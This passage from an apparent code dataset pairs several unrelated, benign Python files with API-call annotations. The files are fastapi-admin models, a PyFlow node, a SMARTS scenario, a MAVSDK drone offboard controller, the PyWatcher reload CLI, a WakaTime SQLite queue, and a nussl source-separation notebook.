'redis_protocol.protocol.serialize_string', 'serialize_string', (['"""PONG"""'], {}), "('PONG')\n", (986, 994), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((1216, 1263), 'redis_protocol.protocol.serialize_error', 'serialize_error', (['"""ERR DB index is out of range"""'], {}), "('ERR DB index is out of range')\n", (1231, 1263), False, 'from redis_protocol.protocol import 
deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((1308, 1330), 'redis_protocol.protocol.serialize_string', 'serialize_string', (['"""OK"""'], {}), "('OK')\n", (1324, 1330), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((4647, 4674), 'redis_protocol.protocol.serialize_bulk_string', 'serialize_bulk_string', (['None'], {}), '(None)\n', (4668, 4674), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((5066, 5085), 'redis_protocol.protocol.serialize_array', 'serialize_array', (['""""""'], {}), "('')\n", (5081, 5085), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((7100, 7127), 'redis_protocol.protocol.serialize_bulk_string', 'serialize_bulk_string', (['None'], {}), '(None)\n', (7121, 7127), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((2871, 2898), 'redis_protocol.protocol.serialize_bulk_string', 'serialize_bulk_string', (['None'], {}), '(None)\n', (2892, 2898), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((3556, 3618), 'redis_protocol.protocol.serialize_error', 'serialize_error', (['"""ERR value is not an integer or out of range"""'], {}), "('ERR value is not an integer or out of range')\n", (3571, 3618), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((7223, 7250), 'redis_protocol.protocol.serialize_bulk_string', 'serialize_bulk_string', (['None'], {}), '(None)\n', 
(7244, 7250), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((2344, 2355), 'time.time', 'time.time', ([], {}), '()\n', (2353, 2355), False, 'import time\n'), ((2668, 2679), 'time.time', 'time.time', ([], {}), '()\n', (2677, 2679), False, 'import time\n')] |
import datetime
from tortoise import Model, fields
from fastapi_admin.models import AbstractAdminLog, AbstractPermission, AbstractRole, AbstractUser
from .enums import ProductType, Status
class User(AbstractUser):
    """Admin-site user account with extra profile fields."""

    # When the most recent login happened; seeded with "now" on creation.
    last_login = fields.DatetimeField(description="Last Login", default=datetime.datetime.now)
    avatar = fields.CharField(max_length=200, default="")
    intro = fields.TextField(default="")
    created_at = fields.DatetimeField(auto_now_add=True)

    def __str__(self):
        return "{}#{}".format(self.pk, self.username)

    def rowVariant(self) -> str:
        # Highlight deactivated accounts in the admin listing.
        return "" if self.is_active else "warning"

    def cellVariants(self) -> dict:
        # Tint the intro cell, but only for active accounts.
        return {"intro": "info"} if self.is_active else {}

    class PydanticMeta:
        computed = ("rowVariant", "cellVariants")
class Permission(AbstractPermission):
    """Concrete permission model used by fastapi-admin.

    Must inherit from AbstractPermission.
    """
class Role(AbstractRole):
    """Concrete role model used by fastapi-admin.

    Must inherit from AbstractRole.
    """
class AdminLog(AbstractAdminLog):
    """Concrete admin action log model used by fastapi-admin.

    Must inherit from AbstractAdminLog.
    """
class Category(Model):
    """Product category, addressed by its slug."""

    slug = fields.CharField(max_length=200)
    name = fields.CharField(max_length=200)
    created_at = fields.DatetimeField(auto_now_add=True)

    def __str__(self):
        return "{}#{}".format(self.pk, self.name)
class Product(Model):
    """A product that can belong to several categories."""

    categories = fields.ManyToManyField("models.Category")
    name = fields.CharField(max_length=50)
    view_num = fields.IntField(description="View Num")
    sort = fields.IntField()
    is_reviewed = fields.BooleanField(description="Is Reviewed")
    type = fields.IntEnumField(ProductType, description="Product Type")
    image = fields.CharField(max_length=200)
    body = fields.TextField()
    created_at = fields.DatetimeField(auto_now_add=True)

    def __str__(self):
        return "{}#{}".format(self.pk, self.name)
class Config(Model):
    """Key/value site configuration entry with an on/off switch."""

    label = fields.CharField(max_length=200)
    key = fields.CharField(max_length=20)
    value = fields.JSONField()
    # Soft enable/disable flag; entries default to enabled.
    status: Status = fields.IntEnumField(Status, default=Status.on)

    def __str__(self):
        return "{}#{}".format(self.pk, self.label)
| [
"tortoise.fields.CharField",
"tortoise.fields.BooleanField",
"tortoise.fields.DatetimeField",
"tortoise.fields.ManyToManyField",
"tortoise.fields.IntEnumField",
"tortoise.fields.IntField",
"tortoise.fields.JSONField",
"tortoise.fields.TextField"
] | [((236, 313), 'tortoise.fields.DatetimeField', 'fields.DatetimeField', ([], {'description': '"""Last Login"""', 'default': 'datetime.datetime.now'}), "(description='Last Login', default=datetime.datetime.now)\n", (256, 313), False, 'from tortoise import Model, fields\n'), ((327, 371), 'tortoise.fields.CharField', 'fields.CharField', ([], {'max_length': '(200)', 'default': '""""""'}), "(max_length=200, default='')\n", (343, 371), False, 'from tortoise import Model, fields\n'), ((384, 412), 'tortoise.fields.TextField', 'fields.TextField', ([], {'default': '""""""'}), "(default='')\n", (400, 412), False, 'from tortoise import Model, fields\n'), ((430, 469), 'tortoise.fields.DatetimeField', 'fields.DatetimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (450, 469), False, 'from tortoise import Model, fields\n'), ((1175, 1207), 'tortoise.fields.CharField', 'fields.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1191, 1207), False, 'from tortoise import Model, fields\n'), ((1219, 1251), 'tortoise.fields.CharField', 'fields.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1235, 1251), False, 'from tortoise import Model, fields\n'), ((1269, 1308), 'tortoise.fields.DatetimeField', 'fields.DatetimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (1289, 1308), False, 'from tortoise import Model, fields\n'), ((1414, 1455), 'tortoise.fields.ManyToManyField', 'fields.ManyToManyField', (['"""models.Category"""'], {}), "('models.Category')\n", (1436, 1455), False, 'from tortoise import Model, fields\n'), ((1467, 1498), 'tortoise.fields.CharField', 'fields.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (1483, 1498), False, 'from tortoise import Model, fields\n'), ((1514, 1553), 'tortoise.fields.IntField', 'fields.IntField', ([], {'description': '"""View Num"""'}), "(description='View Num')\n", (1529, 1553), False, 'from tortoise import Model, fields\n'), ((1565, 1582), 
'tortoise.fields.IntField', 'fields.IntField', ([], {}), '()\n', (1580, 1582), False, 'from tortoise import Model, fields\n'), ((1601, 1647), 'tortoise.fields.BooleanField', 'fields.BooleanField', ([], {'description': '"""Is Reviewed"""'}), "(description='Is Reviewed')\n", (1620, 1647), False, 'from tortoise import Model, fields\n'), ((1659, 1719), 'tortoise.fields.IntEnumField', 'fields.IntEnumField', (['ProductType'], {'description': '"""Product Type"""'}), "(ProductType, description='Product Type')\n", (1678, 1719), False, 'from tortoise import Model, fields\n'), ((1732, 1764), 'tortoise.fields.CharField', 'fields.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1748, 1764), False, 'from tortoise import Model, fields\n'), ((1776, 1794), 'tortoise.fields.TextField', 'fields.TextField', ([], {}), '()\n', (1792, 1794), False, 'from tortoise import Model, fields\n'), ((1812, 1851), 'tortoise.fields.DatetimeField', 'fields.DatetimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (1832, 1851), False, 'from tortoise import Model, fields\n'), ((1951, 1983), 'tortoise.fields.CharField', 'fields.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1967, 1983), False, 'from tortoise import Model, fields\n'), ((1994, 2025), 'tortoise.fields.CharField', 'fields.CharField', ([], {'max_length': '(20)'}), '(max_length=20)\n', (2010, 2025), False, 'from tortoise import Model, fields\n'), ((2038, 2056), 'tortoise.fields.JSONField', 'fields.JSONField', ([], {}), '()\n', (2054, 2056), False, 'from tortoise import Model, fields\n'), ((2078, 2124), 'tortoise.fields.IntEnumField', 'fields.IntEnumField', (['Status'], {'default': 'Status.on'}), '(Status, default=Status.on)\n', (2097, 2124), False, 'from tortoise import Model, fields\n')] |
from Qt import QtCore
from Qt import QtGui
from Qt.QtWidgets import QGraphicsItem
from PyFlow.Core.Common import getConnectedPins
from PyFlow.UI import RESOURCES_DIR
from PyFlow.UI.Utils.Settings import *
from PyFlow.UI.Canvas.Painters import NodePainter
from PyFlow.UI.Canvas.UINodeBase import UINodeBase
class UIRerouteNode(UINodeBase):
def __init__(self, raw_node):
super(UIRerouteNode, self).__init__(raw_node)
self.hover = False
self.headColorOverride = Colors.Gray
self.color = Colors.DarkGray
self.image = RESOURCES_DIR + "/reroute.svg"
def kill(self, *args, **kwargs):
inp = list(self.UIinputs.values())[0]
out = list(self.UIoutputs.values())[0]
newOuts = []
for i in self.UIoutputs.values():
for connection in i.connections:
newOuts.append([connection.destination(), connection.drawDestination])
if inp.connections:
source = inp.connections[0].source()
for out in newOuts:
drawSource = inp.connections[0].drawSource
self.canvasRef().connectPins(source, out[0])
super(UIRerouteNode, self).kill()
def postCreate(self, jsonTemplate=None):
super(UIRerouteNode, self).postCreate(jsonTemplate)
self.input = self.getPin("in")
self.output = self.getPin("out")
self.displayName = "reroute"
self.updateNodeShape()
def paint(self, painter, option, widget):
NodePainter.default(self, painter, option, widget)
| [
"PyFlow.UI.Canvas.Painters.NodePainter.default"
] | [((1497, 1547), 'PyFlow.UI.Canvas.Painters.NodePainter.default', 'NodePainter.default', (['self', 'painter', 'option', 'widget'], {}), '(self, painter, option, widget)\n', (1516, 1547), False, 'from PyFlow.UI.Canvas.Painters import NodePainter\n')] |
from pathlib import Path
from smarts.sstudio import gen_scenario
from smarts.sstudio import types as t
traffic_histories = [
t.TrafficHistoryDataset(
name=f"us101_{hd}",
source_type="NGSIM",
input_path=f"../../xy-trajectories/us101/trajectories-{hd}.txt",
speed_limit_mps=28,
default_heading=0,
)
for hd in ["0750am-0805am", "0805am-0820am", "0820am-0835am"]
]
gen_scenario(
t.Scenario(traffic_histories=traffic_histories), output_dir=Path(__file__).parent
)
| [
"smarts.sstudio.types.TrafficHistoryDataset",
"smarts.sstudio.types.Scenario",
"pathlib.Path"
] | [((131, 309), 'smarts.sstudio.types.TrafficHistoryDataset', 't.TrafficHistoryDataset', ([], {'name': 'f"""us101_{hd}"""', 'source_type': '"""NGSIM"""', 'input_path': 'f"""../../xy-trajectories/us101/trajectories-{hd}.txt"""', 'speed_limit_mps': '(28)', 'default_heading': '(0)'}), "(name=f'us101_{hd}', source_type='NGSIM', input_path\n =f'../../xy-trajectories/us101/trajectories-{hd}.txt', speed_limit_mps=\n 28, default_heading=0)\n", (154, 309), True, 'from smarts.sstudio import types as t\n'), ((434, 481), 'smarts.sstudio.types.Scenario', 't.Scenario', ([], {'traffic_histories': 'traffic_histories'}), '(traffic_histories=traffic_histories)\n', (444, 481), True, 'from smarts.sstudio import types as t\n'), ((494, 508), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (498, 508), False, 'from pathlib import Path\n')] |
#!/usr/bin/env python3
"""
Caveat when attempting to run the examples in non-gps environments:
`drone.offboard.stop()` will return a `COMMAND_DENIED` result because it
requires a mode switch to HOLD, something that is currently not supported in a
non-gps environment.
"""
import asyncio
from math import sqrt
from mavsdk import System
from mavsdk.offboard import (OffboardError, PositionNedYaw)
from time import perf_counter
from math import sqrt, cos, sin, pi
from multiprocessing import Process, Queue
class Drone:
def __init__(self):
self.msg_queue = Queue()
self.msg_queue2 = Queue()
self.msg_queue3 = Queue()
def _run(self):
asyncio.run(self.run())
def _send(self, *args):
self.msg_queue.put(tuple(args))
def _recv(self):
return self.msg_queue.get()
def _send2(self, *args):
self.msg_queue2.put(tuple(args))
def _recv2(self):
return self.msg_queue2.get()
def _send3(self):
self.msg_queue3.put(None)
def _recv3(self):
if self.msg_queue3.empty():
return False
else:
self.msg_queue3.get()
return True
def start(self):
self.p = Process(target=type(self)._run, args=((self),))
self.p.start()
return self.move(0, 0, 0)
def land(self):
self._send(2)
self.p.join()
def move(self, dx, dy, dz, speed=1):
self._send(0, dx, dy, dz, speed)
return self._recv2()
def turn(self, dyaw, speed=180):
self._send(1, dyaw, speed)
return self._recv2()
def move_nowait(self, dx, dy, dz, speed=1):
self._send(0, dx, dy, dz, speed)
def turn_nowait(self, dyaw, speed=1):
self._send(1, dyaw, speed)
def wait(self):
return self._recv2()
def stop(self):
self._send3()
return self._recv2()
async def run(self):
drone = System()
# await drone.connect(system_address="serial:///dev/ttyAMA0:460800")
await drone.connect(system_address="udp://:14551")
print("Waiting for drone to connect...")
async for state in drone.core.connection_state():
if state.is_connected:
print("Drone discovered!")
break
print("Waiting for drone to have a global position estimate...")
async for health in drone.telemetry.health():
if health.is_global_position_ok:
print("Global position estimate ok")
break
print("Fetching amsl altitude at home location....")
async for terrain_info in drone.telemetry.home():
pg0 = terrain_info.latitude_deg, terrain_info.longitude_deg, terrain_info.absolute_altitude_m
break
print("Fetching current heading...")
async for ahrs in drone.telemetry.attitude_euler():
yaw0 = ahrs.yaw_deg*pi/180
print("Current heading: %.2f" % yaw0)
break
print("-- Wait for arming")
async for armed in drone.telemetry.armed():
if armed:
break
print("-- Setting initial setpoint")
await drone.offboard.set_position_ned(PositionNedYaw(0.0, 0.0, 0.0, yaw0))
print("-- Starting offboard")
try:
await drone.offboard.start()
except OffboardError as error:
print(f"Starting offboard mode failed with error code: {error._result.result}")
print("-- Disarming")
await drone.action.disarm()
return
async def get_position():
async for position in drone.telemetry.position_velocity_ned():
return [position.position.north_m, position.position.east_m, position.position.down_m]
async def get_yaw():
async for ahrs in drone.telemetry.attitude_euler():
return ahrs.yaw_deg
await drone.offboard.set_position_ned(PositionNedYaw(*(await get_position())[:-1], -1, (await get_yaw())))
await asyncio.sleep(10)
dl = 0.01
dw = 0.1
while True:
if self.msg_queue.empty():
await asyncio.sleep(0)
continue
msg = self._recv()
if msg[0] == 0:
_, dx, dy, dz, speed = msg
yaw = (await get_yaw())*pi/180
dx, dy = cos(yaw) * dx - sin(yaw) * dy, sin(yaw) * dx + cos(yaw) * dy
x, y, z = await get_position()
tx, ty, tz = x + dx, y + dy, z + dz
start = perf_counter()
t = 0
while (x - tx)**2 + (y - ty)**2 + (z - tz)**2 > dl**2:
current = perf_counter()
while current - start > t:
ll = sqrt((x - tx)**2 + (y - ty)**2 + (z - tz)**2)
x -= dl * (x - tx) / ll
y -= dl * (y - ty) / ll
z -= dl * (z - tz) / ll
t += dl / speed
await drone.offboard.set_position_ned(PositionNedYaw(x, y, z, yaw*180/pi))
await get_position()
if self._recv3():
break
else:
await drone.offboard.set_position_ned(PositionNedYaw(tx, ty, tz, yaw*180/pi))
elif msg[0] == 1:
_, dyaw, speed = msg
x, y, z = await get_position()
yaw = await get_yaw()
tyaw = yaw + dyaw
start = perf_counter()
t = 0
while abs(yaw - tyaw) > dw:
current = perf_counter()
while current - start > t:
yaw -= dw * (yaw - tyaw) / abs(yaw - tyaw)
t += dw / speed
await drone.offboard.set_position_ned(PositionNedYaw(x, y, z, yaw))
await get_yaw()
if self._recv3():
break
else:
await drone.offboard.set_position_ned(PositionNedYaw(x, y, z, tyaw))
elif msg[0] == 2:
break
self._send2([*(await get_position()), await get_yaw()])
await asyncio.sleep(0)
await asyncio.sleep(1)
print("-- Stopping offboard")
try:
await drone.offboard.stop()
except OffboardError as error:
print(f"Stopping offboard mode failed with error code: {error._result.result}")
await asyncio.sleep(1)
print("-- Landing")
await drone.action.land()
if __name__ == "__main__":
drone = Drone()
drone.start()
while True:
try:
msg = input(">> ")
if msg == "stop":
drone.stop()
elif msg == "amove":
dx, dy, dz = map(float, input("dx dy dz: ").split())
drone.move_nowait(dx, dy, dz)
elif msg == "aturn":
dyaw = float(input("dyaw: "))
drone.turn_nowait(dyaw)
elif msg == "move":
dx, dy, dz = map(float, input("dx dy dz: ").split())
drone.move(dx, dy, dz)
elif msg == "turn":
dyaw = float(input("dyaw: "))
drone.turn(dyaw)
elif msg == "wait":
drone.wait()
elif msg == "land":
drone.land()
break
except Exception as e:
print(e)
| [
"mavsdk.offboard.PositionNedYaw",
"math.sqrt",
"time.perf_counter",
"mavsdk.System",
"math.cos",
"asyncio.sleep",
"multiprocessing.Queue",
"math.sin"
] | [((572, 579), 'multiprocessing.Queue', 'Queue', ([], {}), '()\n', (577, 579), False, 'from multiprocessing import Process, Queue\n'), ((606, 613), 'multiprocessing.Queue', 'Queue', ([], {}), '()\n', (611, 613), False, 'from multiprocessing import Process, Queue\n'), ((640, 647), 'multiprocessing.Queue', 'Queue', ([], {}), '()\n', (645, 647), False, 'from multiprocessing import Process, Queue\n'), ((1927, 1935), 'mavsdk.System', 'System', ([], {}), '()\n', (1933, 1935), False, 'from mavsdk import System\n'), ((4037, 4054), 'asyncio.sleep', 'asyncio.sleep', (['(10)'], {}), '(10)\n', (4050, 4054), False, 'import asyncio\n'), ((6323, 6339), 'asyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (6336, 6339), False, 'import asyncio\n'), ((6578, 6594), 'asyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (6591, 6594), False, 'import asyncio\n'), ((3210, 3245), 'mavsdk.offboard.PositionNedYaw', 'PositionNedYaw', (['(0.0)', '(0.0)', '(0.0)', 'yaw0'], {}), '(0.0, 0.0, 0.0, yaw0)\n', (3224, 3245), False, 'from mavsdk.offboard import OffboardError, PositionNedYaw\n'), ((4574, 4588), 'time.perf_counter', 'perf_counter', ([], {}), '()\n', (4586, 4588), False, 'from time import perf_counter\n'), ((6291, 6307), 'asyncio.sleep', 'asyncio.sleep', (['(0)'], {}), '(0)\n', (6304, 6307), False, 'import asyncio\n'), ((4173, 4189), 'asyncio.sleep', 'asyncio.sleep', (['(0)'], {}), '(0)\n', (4186, 4189), False, 'import asyncio\n'), ((4712, 4726), 'time.perf_counter', 'perf_counter', ([], {}), '()\n', (4724, 4726), False, 'from time import perf_counter\n'), ((5568, 5582), 'time.perf_counter', 'perf_counter', ([], {}), '()\n', (5580, 5582), False, 'from time import perf_counter\n'), ((4803, 4854), 'math.sqrt', 'sqrt', (['((x - tx) ** 2 + (y - ty) ** 2 + (z - tz) ** 2)'], {}), '((x - tx) ** 2 + (y - ty) ** 2 + (z - tz) ** 2)\n', (4807, 4854), False, 'from math import sqrt, cos, sin, pi\n'), ((5679, 5693), 'time.perf_counter', 'perf_counter', ([], {}), '()\n', (5691, 5693), False, 
'from time import perf_counter\n'), ((4390, 4398), 'math.cos', 'cos', (['yaw'], {}), '(yaw)\n', (4393, 4398), False, 'from math import sqrt, cos, sin, pi\n'), ((4406, 4414), 'math.sin', 'sin', (['yaw'], {}), '(yaw)\n', (4409, 4414), False, 'from math import sqrt, cos, sin, pi\n'), ((4421, 4429), 'math.sin', 'sin', (['yaw'], {}), '(yaw)\n', (4424, 4429), False, 'from math import sqrt, cos, sin, pi\n'), ((4437, 4445), 'math.cos', 'cos', (['yaw'], {}), '(yaw)\n', (4440, 4445), False, 'from math import sqrt, cos, sin, pi\n'), ((5091, 5130), 'mavsdk.offboard.PositionNedYaw', 'PositionNedYaw', (['x', 'y', 'z', '(yaw * 180 / pi)'], {}), '(x, y, z, yaw * 180 / pi)\n', (5105, 5130), False, 'from mavsdk.offboard import OffboardError, PositionNedYaw\n'), ((5317, 5359), 'mavsdk.offboard.PositionNedYaw', 'PositionNedYaw', (['tx', 'ty', 'tz', '(yaw * 180 / pi)'], {}), '(tx, ty, tz, yaw * 180 / pi)\n', (5331, 5359), False, 'from mavsdk.offboard import OffboardError, PositionNedYaw\n'), ((5906, 5934), 'mavsdk.offboard.PositionNedYaw', 'PositionNedYaw', (['x', 'y', 'z', 'yaw'], {}), '(x, y, z, yaw)\n', (5920, 5934), False, 'from mavsdk.offboard import OffboardError, PositionNedYaw\n'), ((6120, 6149), 'mavsdk.offboard.PositionNedYaw', 'PositionNedYaw', (['x', 'y', 'z', 'tyaw'], {}), '(x, y, z, tyaw)\n', (6134, 6149), False, 'from mavsdk.offboard import OffboardError, PositionNedYaw\n')] |
# coding: utf-8
import argparse
import time
from watchdog.observers import Observer
from pywatcher import PyWatcher
from logging import getLogger, Formatter, StreamHandler, DEBUG
logger = getLogger(__name__)
formatter = Formatter('%(asctime)s - %(levelname)s - %(message)s')
handler = StreamHandler()
handler.setLevel(DEBUG)
handler.setFormatter(formatter)
logger.setLevel(DEBUG)
logger.addHandler(handler)
COMMAND_DESCRIPTION = """\
-----------------------------------------------------------------------
PyWatcher:
monitor file and reload process. like gulp watch
e.g:
pywatcher -t . -c 'ping localhost'
-> if some file on current dir changed, restart process 'ping localhost'.
-----------------------------------------------------------------------
"""
def init():
"""
arguments.
"""
parser = argparse.ArgumentParser(description=COMMAND_DESCRIPTION, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
'-t',
'--target-dir',
type=str,
required=True,
dest='target_dir_path',
help='target directory for watching.'
)
parser.add_argument(
'-c',
'--command',
type=str,
required=True,
dest='target_command_str',
help='target command. this command execute and restart when file changed.'
)
parser.add_argument(
'-s',
'--reload-interval-seconds',
type=int,
required=False,
default=5,
dest='reload_threshold_seconds',
help='reload threshold seconds.'
)
parser.add_argument(
'--reload-wait-seconds',
type=int,
required=False,
default=0,
dest='reload_wait_seconds',
help='reload wait seconds.'
)
parser.add_argument(
'--disable-capture-stdout',
required=False,
action='store_true',
default=False,
dest='is_disable_capture_stdout',
help='is_disable_capture_stdout'
)
parser.add_argument(
'-p',
'--pattern',
type=str,
nargs='*',
required=False,
dest='target_pattern_list',
help='target pattern for monitoring. default, all file match.',
metavar='TARGET_PATTERN',
)
parser.add_argument(
'--signal',
required=False,
type=str,
default='TERM',
choices=('TERM', 'KILL'),
dest='reload_signal',
help='reload_signal'
)
parser.add_argument(
'--is-use-shell',
required=False,
action='store_true',
default=False,
dest='is_use_shell',
help='use shell=True ?'
)
return parser.parse_args()
def main_action(target_dir, command, reload_threshold_seconds, watch_pattern_list,
reload_wait_seconds, is_use_shell, reload_signal, is_disable_capture_stdout):
while True:
event_handler = PyWatcher(
process_command=command,
reload_threshold_seconds=reload_threshold_seconds,
is_capture_subprocess_output=not is_disable_capture_stdout,
pattern_list=watch_pattern_list,
is_use_shell=is_use_shell,
reload_signal=reload_signal,
reload_wait_seconds=reload_wait_seconds,
logger=logger
)
observer = Observer()
observer.schedule(event_handler, target_dir, recursive=True)
observer.start()
try:
while True:
time.sleep(0.3)
except KeyboardInterrupt:
logger.info('stop watch request received.')
observer.stop()
logger.info('stop watch.')
break
observer.join()
def main():
args = init()
main_action(
target_dir=args.target_dir_path,
command=args.target_command_str,
reload_threshold_seconds=args.reload_threshold_seconds,
is_use_shell=args.is_use_shell,
watch_pattern_list=args.target_pattern_list,
reload_signal=args.reload_signal,
reload_wait_seconds=args.reload_wait_seconds,
is_disable_capture_stdout=args.is_disable_capture_stdout,
)
if __name__ in '__main__':
main()
| [
"logging.getLogger",
"logging.StreamHandler",
"argparse.ArgumentParser",
"logging.Formatter",
"time.sleep",
"pywatcher.PyWatcher",
"watchdog.observers.Observer"
] | [((190, 209), 'logging.getLogger', 'getLogger', (['__name__'], {}), '(__name__)\n', (199, 209), False, 'from logging import getLogger, Formatter, StreamHandler, DEBUG\n'), ((222, 276), 'logging.Formatter', 'Formatter', (['"""%(asctime)s - %(levelname)s - %(message)s"""'], {}), "('%(asctime)s - %(levelname)s - %(message)s')\n", (231, 276), False, 'from logging import getLogger, Formatter, StreamHandler, DEBUG\n'), ((287, 302), 'logging.StreamHandler', 'StreamHandler', ([], {}), '()\n', (300, 302), False, 'from logging import getLogger, Formatter, StreamHandler, DEBUG\n'), ((823, 931), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'COMMAND_DESCRIPTION', 'formatter_class': 'argparse.RawTextHelpFormatter'}), '(description=COMMAND_DESCRIPTION, formatter_class=\n argparse.RawTextHelpFormatter)\n', (846, 931), False, 'import argparse\n'), ((2920, 3227), 'pywatcher.PyWatcher', 'PyWatcher', ([], {'process_command': 'command', 'reload_threshold_seconds': 'reload_threshold_seconds', 'is_capture_subprocess_output': '(not is_disable_capture_stdout)', 'pattern_list': 'watch_pattern_list', 'is_use_shell': 'is_use_shell', 'reload_signal': 'reload_signal', 'reload_wait_seconds': 'reload_wait_seconds', 'logger': 'logger'}), '(process_command=command, reload_threshold_seconds=\n reload_threshold_seconds, is_capture_subprocess_output=not\n is_disable_capture_stdout, pattern_list=watch_pattern_list,\n is_use_shell=is_use_shell, reload_signal=reload_signal,\n reload_wait_seconds=reload_wait_seconds, logger=logger)\n', (2929, 3227), False, 'from pywatcher import PyWatcher\n'), ((3336, 3346), 'watchdog.observers.Observer', 'Observer', ([], {}), '()\n', (3344, 3346), False, 'from watchdog.observers import Observer\n'), ((3494, 3509), 'time.sleep', 'time.sleep', (['(0.3)'], {}), '(0.3)\n', (3504, 3509), False, 'import time\n')] |
# -*- coding: utf-8 -*-
"""
wakatime.queue
~~~~~~~~~~~~~~
Queue for offline time logging.
http://wakatime.com
:copyright: (c) 2014 <NAME>.
:license: BSD, see LICENSE for more details.
"""
import logging
import os
import traceback
from time import sleep
try:
import sqlite3
HAS_SQL = True
except ImportError:
HAS_SQL = False
log = logging.getLogger(__name__)
class Queue(object):
DB_FILE = os.path.join(os.path.expanduser('~'), '.wakatime.db')
def connect(self):
conn = sqlite3.connect(self.DB_FILE)
c = conn.cursor()
c.execute('''CREATE TABLE IF NOT EXISTS action (
file text,
time real,
project text,
language text,
lines integer,
branch text,
is_write integer,
plugin text)
''')
return (conn, c)
def push(self, data, plugin):
if not HAS_SQL:
return
try:
conn, c = self.connect()
action = {
'file': data.get('file'),
'time': data.get('time'),
'project': data.get('project'),
'language': data.get('language'),
'lines': data.get('lines'),
'branch': data.get('branch'),
'is_write': 1 if data.get('is_write') else 0,
'plugin': plugin,
}
c.execute('INSERT INTO action VALUES (:file,:time,:project,:language,:lines,:branch,:is_write,:plugin)', action)
conn.commit()
conn.close()
except sqlite3.Error:
log.error(traceback.format_exc())
def pop(self):
if not HAS_SQL:
return None
tries = 3
wait = 0.1
action = None
try:
conn, c = self.connect()
except sqlite3.Error:
log.debug(traceback.format_exc())
return None
loop = True
while loop and tries > -1:
try:
c.execute('BEGIN IMMEDIATE')
c.execute('SELECT * FROM action LIMIT 1')
row = c.fetchone()
if row is not None:
values = []
clauses = []
index = 0
for row_name in ['file', 'time', 'project', 'language', 'lines', 'branch', 'is_write']:
if row[index] is not None:
clauses.append('{0}=?'.format(row_name))
values.append(row[index])
else:
clauses.append('{0} IS NULL'.format(row_name))
index += 1
if len(values) > 0:
c.execute('DELETE FROM action WHERE {0}'.format(' AND '.join(clauses)), values)
else:
c.execute('DELETE FROM action WHERE {0}'.format(' AND '.join(clauses)))
conn.commit()
if row is not None:
action = {
'file': row[0],
'time': row[1],
'project': row[2],
'language': row[3],
'lines': row[4],
'branch': row[5],
'is_write': True if row[6] is 1 else False,
'plugin': row[7],
}
loop = False
except sqlite3.Error:
log.debug(traceback.format_exc())
sleep(wait)
tries -= 1
try:
conn.close()
except sqlite3.Error:
log.debug(traceback.format_exc())
return action
| [
"logging.getLogger",
"traceback.format_exc",
"sqlite3.connect",
"time.sleep",
"os.path.expanduser"
] | [((372, 399), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (389, 399), False, 'import logging\n'), ((450, 473), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (468, 473), False, 'import os\n'), ((530, 559), 'sqlite3.connect', 'sqlite3.connect', (['self.DB_FILE'], {}), '(self.DB_FILE)\n', (545, 559), False, 'import sqlite3\n'), ((1649, 1671), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (1669, 1671), False, 'import traceback\n'), ((1903, 1925), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (1923, 1925), False, 'import traceback\n'), ((3588, 3599), 'time.sleep', 'sleep', (['wait'], {}), '(wait)\n', (3593, 3599), False, 'from time import sleep\n'), ((3717, 3739), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (3737, 3739), False, 'import traceback\n'), ((3548, 3570), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (3568, 3570), False, 'import traceback\n')] |
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.5.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Separation via Time-Frequency Masking
# =====================================
#
# One of the most effective ways to separate sounds from a mixture is by
# *masking*. Consider the following mixture, which we will download via
# one of the dataset hooks in *nussl*.
# +
import nussl
import matplotlib.pyplot as plt
import numpy as np
import copy
import time
start_time = time.time()
musdb = nussl.datasets.MUSDB18(download=True)
item = musdb[40]
mix = item['mix']
sources = item['sources']
# -
# Let's listen to the mixture. Note that it contains 4 sources: drums, bass,
# vocals, and all other sounds (considered as one source: other).
mix.embed_audio()
print(mix)
# Let's now consider the time-frequency representation of this mixture:
plt.figure(figsize=(10, 3))
plt.title('Mixture spectrogram')
nussl.utils.visualize_spectrogram(mix, y_axis='mel')
plt.tight_layout()
plt.show()
# Masking means to assign each of these time-frequency bins to one of the four
# sources in part or in whole. The first method involves creating a *soft* mask
# on the time-frequency representation, while the second is a *binary* mask. How
# do we assign each time-frequency bin to each source? This is a very hard problem,
